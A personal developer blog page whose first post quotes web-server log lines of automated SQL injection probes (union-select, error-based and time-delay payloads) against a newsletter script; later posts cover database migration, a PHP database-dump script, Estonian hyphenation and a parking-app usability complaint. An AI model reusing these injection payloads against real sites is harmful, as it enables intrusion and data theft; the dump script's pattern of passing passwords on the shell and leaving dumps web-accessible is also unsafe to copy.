176.10.100.229 - - [06/Jun/2014:14:20:28 +0300] "GET /newsletter/index.php?id=999999.9%27%20union%20all%20select%200x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%20and%20%27x%27%3D%27x HTTP/1.1" 200 284
176.10.100.229 - - [06/Jun/2014:14:20:29 +0300] "GET /newsletter/index.php?id=999999.9%27%20union%20all%20select%200x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%20and%20%27x%27%3D%27x HTTP/1.1" 200 284
176.10.100.229 - - [06/Jun/2014:14:20:29 +0300] "GET /newsletter/index.php?id=999999.9%27%20union%20all%20select%200x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%20and%20%27x%27%3D%27x HTTP/1.1" 200 284
176.10.100.229 - - [06/Jun/2014:14:20:30 +0300] "GET /newsletter/index.php?id=999999.9%27%20union%20all%20select%200x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%20and%20%27x%27%3D%27x HTTP/1.1" 200 284
176.10.100.229 - - [06/Jun/2014:14:20:30 +0300] "GET /newsletter/index.php?id=999999.9%27%20union%20all%20select%200x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%20and%20%27x%27%3D%27x HTTP/1.1" 200 284
176.10.100.229 - - [06/Jun/2014:14:20:30 +0300] "GET /newsletter/index.php?id=999999.9%27%20union%20all%20select%200x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%20and%20%27x%27%3D%27x HTTP/1.1" 200 284
176.10.100.229 - - [06/Jun/2014:14:20:31 +0300] "GET /newsletter/index.php?id=999999.9%27%20union%20all%20select%200x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%20and%20%27x%27%3D%27x HTTP/1.1" 200 284
176.10.100.229 - - [06/Jun/2014:14:20:31 +0300] "GET /newsletter/index.php?id=999999.9%27%20union%20all%20select%200x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%20and%20%27x%27%3D%27x HTTP/1.1" 200 284
176.10.100.229 - - [06/Jun/2014:14:20:32 +0300] "GET /newsletter/index.php?id=999999.9%27%20union%20all%20select%200x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%20and%20%27x%27%3D%27x HTTP/1.1" 200 284
176.10.100.229 - - [06/Jun/2014:14:20:32 +0300] "GET /newsletter/index.php?id=999999.9%27%20union%20all%20select%200x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%20and%20%27x%27%3D%27x HTTP/1.1" 200 284
176.10.100.229 - - [06/Jun/2014:14:20:33 +0300] "GET /newsletter/index.php?id=41%20and%28select%201%20from%28select%20count%28*%29%2Cconcat%28%28select%20%28select%20concat%280x7e%2C0x27%2Cunhex%28Hex%28cast%28database%28%29%20as%20char%29%29%29%2C0x27%2C0x7e%29%29%20from%20%60information_schema%60.tables%20limit%200%2C1%29%2Cfloor%28rand%280%29*2%29%29x%20from%20%60information_schema%60.tables%20group%20by%20x%29a%29%20and%201%3D1 HTTP/1.1" 200 284
176.10.100.229 - - [06/Jun/2014:14:20:33 +0300] "GET /newsletter/index.php?id=41%20and%28select%201%20from%28select%20count%28*%29%2Cconcat%28%28select%20%28select%20concat%280x7e%2C0x27%2Cdatabase%28%29%2C0x27%2C0x7e%29%29%20from%20%60information_schema%60.tables%20limit%200%2C1%29%2Cfloor%28rand%280%29*2%29%29x%20from%20%60information_schema%60.tables%20group%20by%20x%29a%29%20and%201%3D1 HTTP/1.1" 200 284
176.10.100.229 - - [06/Jun/2014:14:20:34 +0300] "GET /newsletter/index.php?id=convert%28int%2Cdb_name%28%29%29%20and%201%3D1 HTTP/1.1" 200 284
176.10.100.229 - - [06/Jun/2014:14:20:34 +0300] "GET /newsletter/index.php?id=convert%28int%2Cdb_name%28%29%29-- HTTP/1.1" 200 284
176.10.100.229 - - [06/Jun/2014:14:20:34 +0300] "GET /newsletter/index.php?id=41%27%20or%201%3Dconvert%28int%2Cdb_name%28%29%29-- HTTP/1.1" 200 284
176.10.100.229 - - [06/Jun/2014:14:20:35 +0300] "GET /newsletter/index.php?id=41%3B%20if%20%281%3D1%29%20waitfor%20delay%20%2700%3A00%3A01%27-- HTTP/1.1" 200 284
176.10.100.229 - - [06/Jun/2014:14:20:35 +0300] "GET /newsletter/index.php?id=41%27%3B%20if%20%281%3D1%29%20waitfor%20delay%20%2700%3A00%3A01%27-- HTTP/1.1" 200 284
176.10.100.229 - - [06/Jun/2014:14:20:36 +0300] "GET /newsletter/index.php?id=41%20and%20if%281%3D1%2CBENCHMARK%281256666%2CMD5%280x41%29%29%2C0%29 HTTP/1.1" 200 284
176.10.100.229 - - [06/Jun/2014:14:20:36 +0300] "GET /newsletter/index.php?id=41%27%20and%20if%281%3D1%2CBENCHMARK%281256666%2CMD5%280x41%29%29%2C0%29%20and%20%27x%27%3D%27x HTTP/1.1" 200 284
176.10.100.229 - - [06/Jun/2014:14:20:37 +0300] "GET /newsletter/index.php?id=41%27%20or%201%3Dconvert%28int%2C%28select%20concat%28version%28%29%2C0x7233646D3076335F73716C5F696E6A656374696F6E%29%29%29-- HTTP/1.1" 200 284
176.10.100.229 - - [06/Jun/2014:14:20:37 +0300] "GET /newsletter/index.php?id=41%27%20or%201%3Dconvert%28int%2C%28select%20cast%28Char%28114%29%2bChar%2851%29%2bChar%28100%29%2bChar%28109%29%2bChar%2848%29%2bChar%28118%29%2bChar%2851%29%2bChar%2895%29%2bChar%28104%29%2bChar%28118%29%2bChar%28106%29%2bChar%2895%29%2bChar%28105%29%2bChar%28110%29%2bChar%28106%29%2bChar%28101%29%2bChar%2899%29%2bChar%28116%29%2bChar%28105%29%2bChar%28111%29%2bChar%28110%29%20as%20nvarchar%284000%29%29%29%29-- HTTP/1.1" 200 284
176.10.100.229 - - [06/Jun/2014:14:20:38 +0300] "GET /newsletter/index.php?id=41%27%20or%201%3Dconvert%28int%2Cchr%28114%29%7C%7Cchr%2851%29%7C%7Cchr%28100%29%7C%7Cchr%28109%29%7C%7Cchr%2848%29%7C%7Cchr%28118%29%7C%7Cchr%2851%29%7C%7Cchr%2895%29%7C%7Cchr%28104%29%7C%7Cchr%28118%29%7C%7Cchr%28106%29%7C%7Cchr%2895%29%7C%7Cchr%28105%29%7C%7Cchr%28110%29%7C%7Cchr%28106%29%7C%7Cchr%28101%29%7C%7Cchr%2899%29%7C%7Cchr%28116%29%7C%7Cchr%28105%29%7C%7Cchr%28111%29%7C%7Cchr%28110%29%29-- HTTP/1.1" 200 284 

Explanation of 0x31303235343830303536 can be found at Site has been hacked via SQL Injection.

In this case it seems we had just attempt to hack as id was not the right place to brute yourself in – there was a check for if (!intval($this->id)) and another parameter was required… but no prepare, just simple queries with slightly sanitized inputs.

Brrrr… must remove all non-cared-for code.

Postitatud rubriiki cybercrime | Kommenteerimine suletud

moving data from MS SQL to MySQL, on OSX

When I have had to move data from Microsoft SQL Server to MySQL I have used MySQL Workbench data migration wizard – well, presumably used, as there has never been enough time to document the process. But as I spent several hours today trying to re-build the setup and ended using RazorSQL (during last 15 minutes)… some notes for future me googling the same problem.

  • MySQL Workbench requires ODBC for connecting to MS SQL, easiest solution on OSX seems to be OpenLink’s ODBC driver which has 2×14 day trial license (simple installation and configuration).
  • BUT apparently MySQL Workbench requires “View Any Definition” rights from db user, missing from hosted solution I had to access. There is a bug report describing the problem and a tutorial video explaining minimal rights, but in my case neither helped.
  • BTW, Oracle user registration – required to comment on bug – seems to be the worst signup I have ever met, doing crazy stuff like replacing repeat password field contents with ***** (yes, 5 asterisks) after moving to next field and unable to accept auto-fill data. (While looking for solution I also started downloading Microsoft SQL Server Express – and had another unforgettable experience being told on Microsoft ID registration that my password is too long, max being 16 chars…).

And with RazorSQL?

  • download trial
  • use bundled JDBC connector
  • create connection
  • select DBO
  • DB Tools -> Database Conversion -> Convert multiple tables

Resulting SQL was pretty importable using PHPMyAdmin – with the exception of some blob fields that had been marked “not null” for no good reason in MS SQL… And need to import data first and then enforce costraints.

Postitatud rubriiki ms sql, mysql | Kommenteerimine suletud

dumping databases, sometimes with forced latin1

This script dates back to when I needed to dump MySQL database accessed by whatever legacy app that decided to connect as latin1 but send data as utf8 – meaning, that dumping it with usual phpMyAdmin (that connects as utf8) resulted in file that failed to properly import. Well, it did import, but the contents were double-utf8’ed … so at least part of the characters were interpreted incorrectly and I spent hours if not days trying to understand why all character conversion libraries completely fail on my input.

So now, whenever I need to dump MySQL database produced by unfriendly application, I do it from command line and twice – as utf8 and latin1, deciding later whichever dump works better. And as it happens FTP access is much easier to get than SSH… and you can find config with SQL access pretty easily… I don’t even bother myself with anything else – I just upload humpty-dump.php, configure some access variables and hit it from the web side (well, I do take care to rename it before uploading and delete it afterwards, just in case you wonder about the security implications :-).

AND, as I sometimes need to grab also database dumps from WordPress installs with only FTP access (and unwilling to bother myself with installing a database-management plugin)… here comes humpty-dump.php:


<?php

// dump database - either using WordPress config from same directory or locally configured parameters
// v 1.2 (2012-11-25) Peeter Marvet, http://tehnokratt.net

if ( is_file( dirname( __FILE__ ) . '/wp-config.php' ) ) {

    include( dirname( __FILE__ ) . '/wp-config.php' );

} else {

    define('DB_NAME', 'name');
    define('DB_USER', 'user');
    define('DB_PASSWORD', 'pass');
    define('DB_HOST', 'localhost');
    define('DB_CHARSET', 'utf8'); // NB! use latin1 on legacy systems that tend to produce unreadable dumps from phpmyadmin!

}

$backupFile = DB_NAME . "_" .date("Y-m-d-H-i-s");
$command = "mysqldump --opt ";

if ( defined ('DB_CHARSET') ) {
    $command .= "--default-character-set=" . DB_CHARSET . " ";
    $backupFile .= "_" . DB_CHARSET;
}

$backupFile .= '.gz';

$command .= "--host=" . DB_HOST . " --user=" . DB_USER . " --password=" . DB_PASSWORD . " " . DB_NAME . " | gzip > $backupFile";

echo "Dumping <strong>" . DB_NAME . "</strong> on <strong>" . DB_HOST . "</strong>... ";

echo system($command);

echo 'Done! Grab it before it rots: <a href="http://' . $_SERVER['SERVER_NAME'] . '/' . $backupFile . '">' . $backupFile . '</a>';

?>

Postitatud rubriiki mysql, php, wordpress | Kommenteerimine suletud

eestikeelne poolitus veebitekstile

Varsti on kõigil brauseritel CSS3 poolituse tugi olemas… aga seniks-kuniks ajab asja ära hyphenator.js mida muuhulgas soovitab Richard Fink artiklis The Look That Says Book. Olen nimelt parajasti tegelemas veebiakadeemia.ee ettevalmistamisega algavaks saatehooajaks ja poolituse puudumine muutis kitsa veeru peal oleva teksti vastikult sakiliseks.

Kiire guugeldamine ei andnud eestikeelse veebipoolituse kohta ühtki tulemust, seega tuli muuhulgas tekitada hyphenator.js jaoks et.js poolitusmuster – aluseks Enn Saare TeX-muster – ning … nii lihtne see oligi :-) Enn lubas tulemuse LGPL alla ning loodetavasti jõuab see varsti ka hyphenator.js ametlikku distributsiooni, seni võib küsida ajutist versiooni minult meilitsi … või pruukida tehnokratt.net/hyphenator/mergeAndPack.html generaatorit.

Kasutuselevõtt on imelihtne:

  • Hyphenatoriga tuleb kaasa mergeAndPack.html mis pakib poolituse, vajalikud keelemoodulid ning seadistused kenasti üheks minimeeritud javascriptiks kokku (olgu siiski lisatud, et mergeAndPack ei tööta otse kettalt avades vaid eeldab turvapõhjustel käitamist veebiserverist – tehnokratt.net/hyphenator/mergeAndPack.html abiks)
  • Linnutad seal soovitavad keeled, vajadusel timmid poolitamise agressiivsust ning lisad klassi mida vaja poolitada (vaikimisi eeldatakse, et lisad poolitamist vajavale sisule klassi hyphenate – minul siin Thematic’u peale tehtud kujunduses sobib entry-content päris hästi); hetkel tasub mitte lubada CSS3 poolituse tuge (bugi on raporteeritud), sest vähemasti Firefox 3.6 kasutajad saavad sellel puhul veateate (võib muidugi ka leppida sellega, et nad peavad lugema poolitamata teksti ning lihtsalt muutma onError funktsiooni {}-ks ehk mitte-veateadet-väljastavaks).
  • Tulemuseks saad teksti mille võid kopeerida nt hyphenator-et.js failiks.
  • WordPressi puhul tasub see sokutada oma kujundusteema kataloogi ning kui lisada functions.php-sse järgmised kaks rida peakski kõik toimima:
wp_register_script( 'hyphenator', ( get_stylesheet_directory_uri() . "/hyphenator-et.js" ), false, '4.0.0' );
wp_enqueue_script( 'hyphenator' );
Postitatud rubriiki usability | Kommenteerimine suletud

world usability day 2011 soojenduseks esineb m-parkimine

World Usability Day on sedapuhku eriti maagilisel kuupäeval 11.11.11 – ning juhtumisi on mul au modereerida selle tähistamiseks Tallinna Ülikoolis korraldatavat kasutatavuse päeva üritust (mis esinejate nimekirja vaadates saab maailmapäevale kohaselt olema peamiselt ingliskeelne). Ja kuna täna toimub toimkonna koos-oleks – ning mul on see nädal ees veel mõned otsapidi kasutatavusega seonduvad tööd – võiks veidi soojendust teha.

Nimelt sain ma eelmisel nädalal … vist selle aasta esimese parkimistrahvi. Tänu MoPa-nimelisele Androidi-rakendusele on oluliselt vähenenud juhtumid mil kiirustades jääb parkimine alustamata – ja lisaks vähenenud ülekulud tiksuma ununenud aja arvelt. Aga eelmisel nädalal läks nii, et m-parkimine vähemalt Elisa võrgus ei toiminud mistõttu sõnum läks kell 8:25 teele, aga vastust ei tulnud. Püsikasutajana ei jälgi ma enam ammu vastuseks tulevaid sõnumeid, sest 99% ajast ei sisalda need midagi olulist ning jama ilmnes alles trahvilipikut nähes. Õigupoolest tuli kell 12:08 ka teade, et m-parkimine ei toimi… aga selleks ajaks teadsin ma seda isegi.

Ehk siis on meil m-parkimise näol tore massirakendus, mis muuhulgas:

  • ei väljasta mittetoimimise korral adekvaatset infot
  • toodab püsikasutaja jaoks infomüra
  • on piisavalt ebamugav, et kasutatavuse tekitamiseks on vaja app’i (mh vältimaks unustamist ehk üle-maksmist)
  • ainus API on seesama mürarikas/vahelmittetoimiv SMS (tõenäoliselt annaks MoPa rakendust edendada jälgides SMSe ning korraldades paanika kui need ei vasta ootustele – aga selleks peaks ilmselgelt keegi selle eest mingit raha kah maksma ning tõenäoliselt rohkem, kui appstorest saada õnnestub)
  • ilmselt ei oma ka parkimisteenuse-pakkuja jaoks lepingulist tingimust, mis sätestaks kasutajasõbraliku probleemilahenduse teenuse mittetoimimise juhuks

Kui süsteem teadaolevalt ei toimi, võiks mõistagi aidata parkimiskorraldaja kõnekeskus, mis lihtsustatud korras trahvid tühistaks – paraku seletavad nad varmalt, et otseloomulikult on minu ülesanne lugeda läbi SMSid ja jälgida nende korrapärast saabumist… selmet nende asi oleks tagada maksesüsteemide toimimine. Sellest on muideks varem kah juttu olnud (terv!, Karol). Kaubanduskeskuse puhul pidavat olema maksetõrke aeg mille järel inimesed täislaaditud ostukärud saali jätavad ja lahkuvad ca 10 minuti kanti – mis tekitab palju jama ja paneb müüa sisuliselt vastutama e-maksete toimimise eest. Parkimise puhul… noh tegelikult on sarnane lahendus, nagu nähtub kommentaaridest:

Tõe huvides olgu lisatud ka Mardi hilisem kommentaar, ehk siis viha tekitab ennekõike kliendisuhe hetkel, kui õnnestub trahv saada:

Muide mina olen Europargile alati maksnud parkimise eest. Las nemad ka teenivad, ega mul kahju pole. Aga need “trahvid” on sigadus – ajuvabalt kõrged, nagu kliendi varitsemine: “Ahaa, VAHELE JÄID! Nüüd me alles KEERAME sulle!!!” Klient aga võib-olla lihtsalt unustas või m-parkimine ei töötanud vms. Seetõttu kui ma kunagi peaks mõne selle trahvi saama, siis ma tuimalt ei maksa seda ning ei tunne ennast ka üldse halvasti.

Ja tõe huvides olgu lisatud ka see, et olen teemat EuroParkiga arutanud ning nad on sisemas ka ise arvamusel, et klientide kottimine ei ole mõistlik äri ning proovivad vaided mõistusega lahendada. Küllap läheb sama rada ka minu seekordne vaie ehk kõik saab kenasti korda … aga siis ma sattusin netis seda vaiet täitma ja … see asi sobib paraku õpikusse:

Kõigepealt on tore sisestada vaide number – milles sisaldub muideks kontrolöri ID, kuupäev ja kellaaeg – ning siis lisada sinna juurde seesama info kenasti lahtrite kaupa aidates ühtlasti parkimiskorraldajal meelde tuletada, kus täpselt asub ala EP25 ja mis trahvi peal kirjas oli. Ilmselt ei piisa aga sellestki, sest järsku on keegi otsustanud kontrollida mis linnast üldse jutt käib.

Ja siis tuleb ports punkte, mis arvatavasti peaksid paneme vaide esitaja oma kavatsusest loobuma – kas ikka maksid, tegid seda kohe, vastussõnumi said jne. Vaide SISULISE OSA ehk minupoolse selgituse jaoks on jäetud imetilluke lahter.

Edasi… Arvake ära mis juhtub, kui ma otsustan vaide teele saata? Loomulikult saan veateate:

Mmmm… kogu probleem ongi ju selles, et teie maksesüsteem ei toiminud ning ei saatnud vastust mille ma vastava radio-buttoniga ka kenasti ära märkisin, eksju? Sealt edasi kuvatakse mulle kinnitus-popup kus minu tekst on segamini igatmasti tehnilise infoga (ülaservas oli mh MAX_FILE_SIZE 8000000) ning nupp selle väljatrükkimiseks:

… ja vähemalt OSX+Chrome puhul juhtub Prindi-nuppu painates järgmine asi:

Ma siia sappa mingit moraali lisama ei hakka – kuigi kange soov oleks kehtestada kasutaja-poolne leppetrahv tarkvara-arendajatele. Ahjah, sai ju just pikalt arutatud, et trahv ei ole lahendus kah…

Miska tuleks lihtsalt tagasi loo alguse juurde – ehk 11.11.11 on usability day ja selleks puhuks korraldatava ürituse teemaks on kasutatavus tarkvara-arenduse protsessis. Üritusest on aga vähe tolku, kui sinna tulevad ainult igat masti kasutaja-interaktsiooni-fännid – vaja oleks rohkem neid, kes kasutaja peale mittemõtlemise tõttu vigu teevad.

Postitatud rubriiki usability | Kommenteerimine suletud
  • Viimane veerg

    Mina olen Peeter Marvet (pets@tehnokratt.net). Ei saa täielikult välistada, et see siin oli kunagi minu ajaveeb. Kirjapandu ei pruugi väljendada seisu- ega istmekohti. Seoses surutisega esilehe mahtu vähendatud 8%. Lisandub käibemaks, Tallinna elanikel ka müügi- ja paadimaks. Pakendatud gaasikeskkonda. Valmistatud arvutis milles võib leiduda väheses koguses piima- ja pähklitükke. Ei sisalda hüdrogeenitud (transarasvavabasid) taimseid rasvhappeid, sisaldab vahustatud lämmastikku.